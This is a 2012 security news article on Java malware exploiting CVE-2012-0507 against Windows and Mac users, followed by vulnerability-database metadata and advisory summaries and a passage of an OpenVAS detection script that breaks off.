New Java Malware Exploits Both Windows And Mac Users

2012-04-24T17:37:49

Description

Symantec has discovered a new form of Java malware that infects both Apple and Windows machines, according to research posted on the company’s Security Response blog. [The entry](<https://threatpost.com/new-java-malware-exploits-both-windows-and-mac-users-042412/>), penned by researcher Takashi Katsuki, describes a strain of Java Applet malware that either drops a Python-based malware in Mac operating systems or an executable-form of malware in Windows computers. If opened, both forms of malware could launch a Trojan horse that could trigger a back door on the computer, regardless of the platform. The malware exploits the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) to download the malware. According to the post, the Mac back door Trojan can currently only control polling times, or “how many times it gets commands from the server at certain time intervals.” If enabled however, the Trojan can also download files, list files and folders, open a remote shell, sleep or upload files. The Trojan for Windows can send information about the infected computer and disk, its memory usage, OS version and user name, in addition to downloading and executing files and opening shells to receive commands. The news of this malware comes on the heels of [Flashback](<https://threatpost.com/flashback-mac-trojan-hits-more-500k-machines-040512/>) and [SabPub](<https://threatpost.com/new-mac-malware-sabpub-used-targeted-attacks-041612/>), two forms of malware that have been targeting Mac users throughout the first quarter of this year via another vulnerability in Java. The vulnerability CVE-2012-0507 — an older Java flaw that was recently [blocked by Mozilla’s Firefox](<https://threatpost.com/mozilla-adds-older-java-versions-firefox-blocklist-040312/>) — was used by some Flashback variants [earlier this month](<http://www.f-secure.com/weblog/archives/00002341.html>), before [being patched](<https://threatpost.com/apple-issues-update-prevent-flashback-malware-infecting-mac-os-x-machines-040312/>) by [Apple](<http://support.apple.com/kb/HT5228?viewlocale=en_US&locale=en_US>). ![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065602/javamalware.jpg)

{"id": "THREATPOST:9982AC17285494A6CE329FC5C04DD84A", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "New Java Malware Exploits Both Windows And Mac Users", "description": "Symantec has discovered a new form of Java malware that infects both Apple and Windows machines, according to research posted on the company\u2019s Security Response blog.\n\n[The entry](<https://threatpost.com/new-java-malware-exploits-both-windows-and-mac-users-042412/>), penned by researcher Takashi Katsuki, describes a strain of Java Applet malware that either drops a Python-based malware in Mac operating systems or an executable-form of malware in Windows computers. If opened, both forms of malware could launch a Trojan horse that could trigger a back door on the computer, regardless of the platform.\n\nThe malware exploits the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507) to download the malware.\n\nAccording to the post, the Mac back door Trojan can currently only control polling times, or \u201chow many times it gets commands from the server at certain time intervals.\u201d If enabled however, the Trojan can also download files, list files and folders, open a remote shell, sleep or upload files.\n\nThe Trojan for Windows can send information about the infected computer and disk, its memory usage, OS version and user name, in addition to downloading and executing files and opening shells to receive commands.\n\nThe news of this malware comes on the heels of [Flashback](<https://threatpost.com/flashback-mac-trojan-hits-more-500k-machines-040512/>) and [SabPub](<https://threatpost.com/new-mac-malware-sabpub-used-targeted-attacks-041612/>), two forms of malware that have been targeting Mac users throughout the first quarter of this year via another vulnerability in Java.\n\nThe vulnerability CVE-2012-0507 \u2014 an older Java flaw that was recently [blocked by Mozilla\u2019s Firefox](<https://threatpost.com/mozilla-adds-older-java-versions-firefox-blocklist-040312/>) \u2014 was used by some Flashback variants [earlier this month](<http://www.f-secure.com/weblog/archives/00002341.html>), before [being patched](<https://threatpost.com/apple-issues-update-prevent-flashback-malware-infecting-mac-os-x-machines-040312/>) by [Apple](<http://support.apple.com/kb/HT5228?viewlocale=en_US&locale=en_US>).\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2013/04/07065602/javamalware.jpg)\n", "published": "2012-04-24T17:37:49", "modified": "2013-04-17T16:32:23", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/new-java-malware-exploits-both-windows-and-mac-users-042412/76476/", "reporter": "Chris Brook", "references": ["https://threatpost.com/new-java-malware-exploits-both-windows-and-mac-users-042412/", "https://threatpost.com/flashback-mac-trojan-hits-more-500k-machines-040512/", "https://threatpost.com/new-mac-malware-sabpub-used-targeted-attacks-041612/", "https://threatpost.com/mozilla-adds-older-java-versions-firefox-blocklist-040312/", "http://www.f-secure.com/weblog/archives/00002341.html", "https://threatpost.com/apple-issues-update-prevent-flashback-malware-infecting-mac-os-x-machines-040312/", "http://support.apple.com/kb/HT5228?viewlocale=en_US&locale=en_US"], "cvelist": ["CVE-2012-0507", "CVE-2012-2110"], "immutableFields": [], "lastseen": "2018-10-06T23:03:15", "viewCount": 8, "enchantments": {"score": {"value": 2.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "aix", "idList": ["OPENSSL_ADVISORY4.ASC"]}, {"type": "amazon", "idList": ["ALAS-2012-072", "ALAS-2012-073"]}, {"type": "attackerkb", "idList": ["AKB:ED494A43-9779-4766-AFD9-B3A3F48CD048"]}, {"type": "canvas", "idList": ["JAVA_ATOMICREFERENCEARRAY"]}, {"type": "centos", "idList": ["CESA-2012:0135", "CESA-2012:0518"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-139", "CPAI-2012-150", "CPAI-2013-3486", "CPAI-2014-2364"]}, {"type": "checkpoint_security", "idList": ["CPS:SK71821"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2012-0507"]}, {"type": "cve", "idList": ["CVE-2011-3571", "CVE-2012-0507", "CVE-2012-2110", "CVE-2012-2131"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2420-1:46A36", "DEBIAN:DSA-2454-1:93836", "DEBIAN:DSA-2454-2:7B396"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2012-2110", "DEBIANCVE:CVE-2012-2131"]}, {"type": "exploitdb", "idList": ["EDB-ID:18679", "EDB-ID:18756"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B68BB9381148CAC1A9824EB84CA5D160"]}, {"type": "f5", "idList": ["F5:K17454", "SOL16285", "SOL17454"]}, {"type": "fedora", "idList": ["FEDORA:5CD8320BD3", "FEDORA:8ED3020FF6", "FEDORA:A271421BA0", "FEDORA:C411B20546", "FEDORA:CBD0920588", "FEDORA:D9C0A2139E"]}, {"type": "freebsd", "idList": ["2AE114DE-C064-11E1-B5E0-000C299B62E1", "7184F92E-8BB8-11E1-8D7B-003067B2972C"]}, {"type": "freebsd_advisory", "idList": ["FREEBSD_ADVISORY:FREEBSD-SA-12:01.OPENSSL"]}, {"type": "gentoo", "idList": ["GLSA-201312-03", "GLSA-201401-30"]}, {"type": "ibm", "idList": ["1DC0A9C6D3EFE4EEA571DAAA9286B8F974D5ECF8F3BAAA188781D697B6DC2546", "306F0F5B9EBAA5A123DBEA7D5C32E94515078239AFA1D40465B7275E07FFDD37", "52BFEC965C91FFF9EB67268FE505ABA82DAD2FDA3420E0AE67F8478C590BB2EA", "583215B42F049307CBBCA8930CB40F87016DA7B011EFC8B5B01AB18DCA1B1F3E", "5B217885499AAC546E6A53F4B00F12183C8D124873A651C8331A3C6390E1B879", "8F73A6D9460746098942CDD034332E627DD5C59C903F65333D90F95100657ED8", "9565FEEA0E13F1CACE459E1DD36D5E9CAB4712E2148193C52D850073C5948478", "AC9F2A66DF69281160228F889374ECE84DEF1729FFE72F3F738F15249648412B", "B8CDE2E20BC16C41FC85BA2A86684E11CDAD295FBFA9F508C045F715A67AC321", "D6EE1AE15F7BD96FCB1799E31A9E36026979DFE8E702302D459578E3398E8FC4", "E0A58ED8F9D2EAC5F3D7B7629F5373292F4D9CAE0E0ACB4EFB9DF940BFA17EC8", "E718305B80885810F902CE850143D8E41B3321E883AB24867E49DDC4822F4153"]}, {"type": "lenovo", "idList": ["LENOVO:PS500190-INTEL-PROSETWIRELESS-WIFI-SOFTWARE-VULNERABILITIES-NOSID", "LENOVO:PS500190-NOSID"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-BROWSER-JAVA_ATOMICREFERENCEARRAY-"]}, {"type": "nessus", "idList": ["6857.PRM", "801016.PRM", "AIX_OPENSSL_ADVISORY4.NASL", "ALA_ALAS-2012-72.NASL", "ALA_ALAS-2012-73.NASL", "CENTOS_RHSA-2012-0135.NASL", "CENTOS_RHSA-2012-0518.NASL", "DEBIAN_DSA-2420.NASL", "DEBIAN_DSA-2454.NASL", "EULEROS_SA-2019-1548.NASL", "F5_BIGIP_SOL16285.NASL", "FEDORA_2012-18035.NASL", "FEDORA_2012-6343.NASL", "FEDORA_2012-6395.NASL", "FEDORA_2012-6403.NASL", "FREEBSD_PKG_2AE114DEC06411E1B5E0000C299B62E1.NASL", "FREEBSD_PKG_7184F92E8BB811E18D7B003067B2972C.NASL", "GENTOO_GLSA-201312-03.NASL", "GENTOO_GLSA-201401-30.NASL", "HPSMH_7_2_1_0.NASL", "JUNIPER_PSN-2012-07-645.NASL", "JUNIPER_SPACE_JSA10659.NASL", "MACOSX_10_8_4.NASL", "MACOSX_JAVA_10_6_UPDATE7.NASL", "MACOSX_JAVA_10_7_2012-001.NASL", "MACOSX_SECUPD2013-002.NASL", "MANDRIVA_MDVSA-2012-060.NASL", "MANDRIVA_MDVSA-2012-064.NASL", "NEWSTART_CGSL_NS-SA-2019-0020_OPENSSL098E.NASL", "NEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL", "OPENSSL_0_9_8V.NASL", "OPENSSL_1_0_0I.NASL", "OPENSSL_1_0_1A.NASL", "OPENSUSE-2012-308.NASL", "OPENSUSE-2013-153.NASL", "ORACLELINUX_ELSA-2012-0135.NASL", "ORACLELINUX_ELSA-2012-0322.NASL", "ORACLELINUX_ELSA-2012-0518.NASL", "ORACLELINUX_ELSA-2012-2011.NASL", "ORACLEVM_OVMSA-2014-0007.NASL", "ORACLEVM_OVMSA-2014-0008.NASL", "ORACLE_JAVA_CPU_FEB_2012.NASL", "ORACLE_JAVA_CPU_FEB_2012_UNIX.NASL", "REDHAT-RHSA-2012-0135.NASL", "REDHAT-RHSA-2012-0139.NASL", "REDHAT-RHSA-2012-0322.NASL", "REDHAT-RHSA-2012-0508.NASL", "REDHAT-RHSA-2012-0514.NASL", "REDHAT-RHSA-2012-0518.NASL", "REDHAT-RHSA-2012-0522.NASL", "REDHAT-RHSA-2013-1455.NASL", "SL_20120424_OPENSSL_ON_SL5_X.NASL", "SOLARIS11_OPENSSL_20120626.NASL", "SUSE_11_COMPAT-OPENSSL097G-120830.NASL", "SUSE_11_JAVA-1_6_0-IBM-120427.NASL", "SUSE_11_LIBOPENSSL-DEVEL-120503.NASL", "SUSE_COMPAT-OPENSSL097G-8262.NASL", "SUSE_JAVA-1_5_0-IBM-8100.NASL", "SUSE_JAVA-1_6_0-IBM-8094.NASL", "SUSE_OPENSSL-8112.NASL", "UBUNTU_USN-1373-1.NASL", "UBUNTU_USN-1373-2.NASL", "UBUNTU_USN-1424-1.NASL", "UBUNTU_USN-1428-1.NASL", "VMWARE_ESX_VMSA-2013-0003_REMOTE.NASL", "VMWARE_VCENTER_VMSA-2012-0013.NASL", "VMWARE_VMSA-2012-0013.NASL", "VMWARE_VMSA-2012-0013_REMOTE.NASL", "VMWARE_VMSA-2013-0003.NASL"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2012-2110", "OPENSSL:CVE-2012-2131"]}, {"type": "openvas", "idList": ["OPENVAS:103558", "OPENVAS:103672", "OPENVAS:103849", "OPENVAS:1361412562310103558", "OPENVAS:1361412562310103672", "OPENVAS:1361412562310103849", "OPENVAS:1361412562310105413", "OPENVAS:1361412562310120151", "OPENVAS:1361412562310120152", "OPENVAS:1361412562310121084", "OPENVAS:1361412562310121127", "OPENVAS:1361412562310123929", "OPENVAS:1361412562310123981", "OPENVAS:1361412562310123987", "OPENVAS:136141256231071148", "OPENVAS:136141256231071259", "OPENVAS:136141256231071261", "OPENVAS:136141256231071273", "OPENVAS:136141256231071533", "OPENVAS:1361412562310802738", "OPENVAS:1361412562310802947", "OPENVAS:1361412562310804061", "OPENVAS:1361412562310831568", "OPENVAS:1361412562310831657", "OPENVAS:1361412562310840909", "OPENVAS:1361412562310840919", "OPENVAS:1361412562310840985", "OPENVAS:1361412562310840987", "OPENVAS:1361412562310864192", "OPENVAS:1361412562310864229", "OPENVAS:1361412562310864279", "OPENVAS:1361412562310864283", "OPENVAS:1361412562310864325", "OPENVAS:1361412562310870589", "OPENVAS:1361412562310881108", "OPENVAS:1361412562310881190", "OPENVAS:1361412562311220191548", "OPENVAS:71148", "OPENVAS:71259", "OPENVAS:71261", "OPENVAS:71273", "OPENVAS:71533", "OPENVAS:802738", "OPENVAS:802947", "OPENVAS:831568", "OPENVAS:831657", "OPENVAS:840909", "OPENVAS:840919", "OPENVAS:840985", "OPENVAS:840987", "OPENVAS:864192", "OPENVAS:864229", "OPENVAS:864279", "OPENVAS:864283", "OPENVAS:864325", "OPENVAS:870589", "OPENVAS:881108", "OPENVAS:881190"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0135", "ELSA-2012-0322", "ELSA-2012-0518", "ELSA-2012-2011", "ELSA-2014-0626", "ELSA-2015-3022", "ELSA-2016-3621", "ELSA-2019-4581", "ELSA-2019-4747", "ELSA-2021-9150"]}, {"type": "osv", "idList": ["OSV:DSA-2420-1", "OSV:DSA-2454-1", "OSV:DSA-2454-2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:111412"]}, {"type": "redhat", "idList": ["RHSA-2012:0135", "RHSA-2012:0139", "RHSA-2012:0322", "RHSA-2012:0508", "RHSA-2012:0514", "RHSA-2012:0518", "RHSA-2012:0522", "RHSA-2012:1306", "RHSA-2012:1307", "RHSA-2012:1308", "RHSA-2013:1455"]}, {"type": "saint", "idList": ["SAINT:2A2447E1BCC3EED8CC15036CFE02E6AD", "SAINT:58DAD69110330F9994F6C382A9E66468", "SAINT:6558E3E080367BA482316AE6D48877BA", "SAINT:862F3D5093666FCD7985C6448451D516"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27941", "SECURITYVULNS:DOC:28007", "SECURITYVULNS:DOC:28164", "SECURITYVULNS:DOC:28706", "SECURITYVULNS:DOC:29464", "SECURITYVULNS:DOC:29623", "SECURITYVULNS:DOC:29856", "SECURITYVULNS:DOC:30448", "SECURITYVULNS:VULN:12205", "SECURITYVULNS:VULN:12332", "SECURITYVULNS:VULN:12425", "SECURITYVULNS:VULN:12679", "SECURITYVULNS:VULN:13198", "SECURITYVULNS:VULN:13310", "SECURITYVULNS:VULN:13663"]}, {"type": "seebug", "idList": ["SSV:30150", "SSV:60076", "SSV:60220", "SSV:72735", "SSV:72797"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0602-1", "SUSE-SU-2012:0603-1", "SUSE-SU-2012:0623-1", "SUSE-SU-2012:0637-1", "SUSE-SU-2012:0674-1", "SUSE-SU-2012:1149-1", "SUSE-SU-2012:1149-2"]}, {"type": "symantec", "idList": ["SMNTC-52161"]}, {"type": "thn", "idList": ["THN:74600659E59FBC081B6540EF1DCE11D3"]}, {"type": "threatpost", "idList": ["THREATPOST:427F2EA5BAE6D1C835F7B049DD5D6D27", "THREATPOST:61D681852E79564E99078768957CB417", "THREATPOST:635801BB456AF20B4CCF183C2BD94E5A", "THREATPOST:7B46C96564251E67650F604C0B32BC46", "THREATPOST:862191C4B9FAB2D3FF3980991801A529", "THREATPOST:86859A3C9EC793C6A0592ED93308A9DD", "THREATPOST:A1DDB45DCB57F828DB4CF6A503E200DF", "THREATPOST:B5AADAB1C60C6F2AFCCBC532326ED087", "THREATPOST:B5CB39945899ADD3A3D3790E21175180", "THREATPOST:CC15A784882157020D893E0B44732332", "THREATPOST:D28C33F2DE823C49041D452AE3C37607", "THREATPOST:F12913D59D338ABFA8959ABE0730DC2B", "THREATPOST:F992B1B74265E26E8C7499D1F03622D7"]}, {"type": "ubuntu", "idList": ["USN-1373-1", "USN-1373-2", "USN-1424-1", "USN-1428-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-3571", "UB:CVE-2012-0507", "UB:CVE-2012-2110", "UB:CVE-2012-2131"]}, {"type": "vmware", "idList": ["VMSA-2012-0013", "VMSA-2012-0013.2", "VMSA-2013-0003"]}]}, "backreferences": {"references": [{"type": "aix", "idList": ["OPENSSL_ADVISORY4.ASC"]}, {"type": "amazon", "idList": ["ALAS-2012-072"]}, {"type": "attackerkb", "idList": ["AKB:ED494A43-9779-4766-AFD9-B3A3F48CD048"]}, {"type": "centos", "idList": ["CESA-2012:0135", "CESA-2012:0518"]}, {"type": "checkpoint_security", "idList": ["CPS:SK71821"]}, {"type": "cve", "idList": ["CVE-2012-0507", "CVE-2012-2110"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2012-2110"]}, {"type": "exploitdb", "idList": ["EDB-ID:18756"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B68BB9381148CAC1A9824EB84CA5D160"]}, {"type": "f5", "idList": ["SOL16285", "SOL17454"]}, {"type": "fedora", "idList": ["FEDORA:5CD8320BD3", "FEDORA:8ED3020FF6", "FEDORA:C411B20546"]}, {"type": "freebsd", "idList": ["2AE114DE-C064-11E1-B5E0-000C299B62E1", "7184F92E-8BB8-11E1-8D7B-003067B2972C"]}, {"type": "gentoo", "idList": ["GLSA-201401-30"]}, {"type": "ibm", "idList": ["583215B42F049307CBBCA8930CB40F87016DA7B011EFC8B5B01AB18DCA1B1F3E"]}, {"type": "lenovo", "idList": ["LENOVO:PS500190-NOSID"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/JAVA_ATOMICREFERENCEARRAY", "MSF:ILITIES/HPUX-CVE-2012-2110/"]}, {"type": "nessus", "idList": ["ALA_ALAS-2012-73.NASL", "FEDORA_2012-6343.NASL", "FEDORA_2012-6395.NASL", "MANDRIVA_MDVSA-2012-060.NASL", "REDHAT-RHSA-2012-0135.NASL", "REDHAT-RHSA-2012-0522.NASL", "SUSE_OPENSSL-8112.NASL", "UBUNTU_USN-1373-1.NASL", "VMWARE_VMSA-2012-0013_REMOTE.NASL"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2012-2110"]}, {"type": "openvas", "idList": ["OPENVAS:864283"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0135", "ELSA-2012-0322"]}, {"type": "redhat", "idList": ["RHSA-2012:0135", "RHSA-2012:0139", "RHSA-2012:0322", "RHSA-2012:0514", "RHSA-2012:1308"]}, {"type": "saint", "idList": ["SAINT:862F3D5093666FCD7985C6448451D516"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:29464", "SECURITYVULNS:VULN:13310"]}, {"type": "seebug", "idList": ["SSV:30150"]}, {"type": "suse", "idList": ["SUSE-SU-2012:0637-1", "SUSE-SU-2012:1149-2"]}, {"type": "thn", "idList": ["THN:74600659E59FBC081B6540EF1DCE11D3"]}, {"type": "threatpost", "idList": ["THREATPOST:635801BB456AF20B4CCF183C2BD94E5A", "THREATPOST:CC15A784882157020D893E0B44732332"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2012-0507"]}, {"type": "vmware", "idList": ["VMSA-2012-0013"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2012-0507", "epss": "0.973120000", "percentile": "0.997450000", "modified": "2023-03-15"}, {"cve": "CVE-2012-2110", "epss": "0.110130000", "percentile": "0.941900000", "modified": "2023-03-15"}], "vulnersScore": 2.0}, "_state": {"dependencies": 1678917980, "score": 1698837370, "epss": 1678938645}, "_internal": {"score_hash": "8620e1b0696a0246ea7e79ecc5e4b390"}}

{"checkpoint_advisories": [{"lastseen": "2021-12-17T11:53:53", "description": "A code execution vulnerability has been reported in Oracle Java SE. The vulnerability is due to a design flaw in the implementation of the AtomicReferenceArray class in Java SE. An attacker could exploit this vulnerability by enticing a target user to open a specially crafted Java application. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {}, "published": "2014-12-28T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java AtomicReferenceArray Sandbox Breach Code Execution - Ver2 (CVE-2012-0507)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2019-07-07T00:00:00", "id": "CPAI-2014-2364", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:10:47", "description": "A remote code execution vulnerability has been reported in Oracle Java SE.", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Oracle Java AtomicReferenceArray Sandbox Breach Code Execution (CVE-2012-0507)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-139", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:10:49", "description": "A buffer overflow vulnerability has been reported in Sun Java SE Runtime Environment.", "cvss3": {}, "published": "2012-04-16T00:00:00", "type": "checkpoint_advisories", "title": "Protection against Black Hole Toolkit v1.2.3 Java Array Exploits (CVE-2009-1671; CVE-2012-0507)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-1671", "CVE-2012-0507"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-150", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-12-17T12:13:26", "description": "BlackHole is a web exploit kit that operates by delivering malicious payload to the victim's computer. Remote attackers can infect users with BlackHole by enticing them to visit a malicious web page. Successful infection will allow the attacker to download additional malware to the target.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "BlackHole Toolkit v2 JAVA Payload Stage Code Execution (CVE-2012-0507; CVE-2012-1723; CVE-2013-0422; CVE-2013-0431; CVE-2013-1493)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507", "CVE-2012-1723", "CVE-2013-0422", "CVE-2013-0431", "CVE-2013-1493"], "modified": "2017-03-01T00:00:00", "id": "CPAI-2013-3486", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2023-04-18T13:04:15", "description": "The IBM Java SE version 6 release includes the IBM Java 6 Runtime Environment and the IBM Java 6 Software Development Kit. java-1.6.0-ibm is vulnerable to denial of service(DoS). This update fixes several vulnerabilities in the IBM Java 6 Runtime Environment and the IBM Java 6 Software Development Kit. \n", "cvss3": {}, "published": "2019-05-02T04:41:06", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0507"], "modified": "2022-05-13T16:44:26", "id": "VERACODE:13752", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-13752/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-18T16:12:52", "description": "OpenSSL is vulnerable to denial of service (DoS) attacks and possible other attacks. These attacks are possible because the asn1_d2i_read_bio function doesn't correctly interpret integer data which can be leveraged to do buffer overflow attacks or cause memory consumption.\n", "cvss3": {}, "published": "2017-02-09T00:33:40", "type": "veracode", "title": "Denial Of Service (DoS) Through Memory Consumption And Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2019-05-15T06:17:58", "id": "VERACODE:3520", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-3520/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T13:24:02", "description": "OpenSSL is vulnerable to denial of service (DoS) attacks and possible other attacks. These attacks are possible because the asn1_d2i_read_bio function doesn't correctly interpret integer data which can be leveraged to do buffer overflow attacks or cause memory consumption.\n", "cvss3": {}, "published": "2019-01-15T08:50:55", "type": "veracode", "title": "Denial Of Service (DoS) Through Memory Consumption And Buffer Overflow", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2110"], "modified": "2019-05-15T06:17:58", "id": "VERACODE:10700", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-10700/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2017-11-13T12:51:09", "description": "This host is installed with Oracle Java SE and is prone to code\n execution vulnerability.", "cvss3": {}, "published": "2012-08-22T00:00:00", "type": "openvas", "title": "Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0507"], "modified": "2017-11-08T00:00:00", "id": "OPENVAS:802947", "href": "http://plugins.openvas.org/nasl.php?oid=802947", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_oracle_java_se_code_exec_vuln_win.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows)\n#\n# Authors:\n# Madhuri D <dmadhuri@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attackers to bypass the Java sandbox\n restriction and execute arbitrary code.\n Impact Level: System/Application\";\ntag_affected = \"Oracle Java SE versions 7 Update 2 and earlier, 6 Update 30 and earlier,\n and 5.0 Update 33 and earlier\";\ntag_insight = \"The 'AtomicReferenceArray' class implementation does not ensure that the\n array is of the Object[] type, which allows attackers to cause a denial of\n service (JVM crash) or bypass Java sandbox restrictions.\";\ntag_solution = \"Apply the patch from below link\n http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html\";\ntag_summary = \"This host is installed with Oracle Java SE and is prone to code\n execution vulnerability.\";\n\nif(description)\n{\n script_id(802947);\n script_version(\"$Revision: 7699 $\");\n script_cve_id(\"CVE-2012-0507\");\n script_bugtraq_id(52161);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-22 15:52:21 +0530 (Wed, 22 Aug 2012)\");\n script_name(\"Oracle Java SE Java Runtime Environment Code Execution Vulnerability - (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48589\");\n script_xref(name : \"URL\" , value : \"http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html\");\n script_xref(name : \"URL\" , value : 